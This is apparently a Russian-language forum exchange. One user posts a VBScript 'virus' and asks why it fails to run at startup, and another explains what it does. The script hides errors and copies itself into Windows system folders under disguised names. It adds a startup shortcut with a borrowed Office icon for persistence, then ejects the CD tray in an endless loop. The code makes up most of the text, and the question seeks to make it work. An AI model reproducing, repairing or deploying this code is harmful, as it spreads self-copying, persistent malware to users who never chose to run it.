Анастасия

Объясните почему вирус хоть и в автозагрузке, но не срабатывает при включении компа? И вообще как работает он пожалуйста.

On Error Resume Next
Dim FileSysObject, File
Set FileSysObject = CreateObject ("Scripting.FileSystemObject")
Set File = FileSysObject.GetFile(WScript.ScriptFullName)
Set s = CreateObject("Wscript.Shell")
File.Copy ("C:\WINDOWS\Fonts\MsFonts.vbe")
File.Copy ("C:\WINDOWS\System32\Ineternet Fast.exe.vbe")
Dim WSHShell
Set WSHShell = WScript.CreateObject("WScript.Shell")
Dim MyShortcut, MyDesktop, StartupPath
StartupPath = WSHShell.SpecialFolders("Startup")
Set MyShortcut = WSHShell.CreateShortcut(StartupPath & _
"\diskov.lnk")
MyShortcut.TargetPath = WSHShell.ExpandEnvironmentStrings("C:\WINDOWS\Fonts\MsFonts.vbe")
MyShortcut.IconLocation = WSHShell.ExpandEnvironmentStrings("C:\Program Files\Common Files\Microsoft Shared\Off\MSOICONS.exe")
MyShortcut.Save

Set WMPlayer = CreateObject("WMPlayer.OCX.7")
do
WMPlayer.CdRomCollection.Item(0).Eject()
loop

Александра

При запуске размножается, прописывает себя в автозагрузку и открывает лоток CD/DVD привода. Не работает по причине криворукости писавшего или (что более вероятно) ошибки оставлены намерено, что-бы всякая школота не баловалась.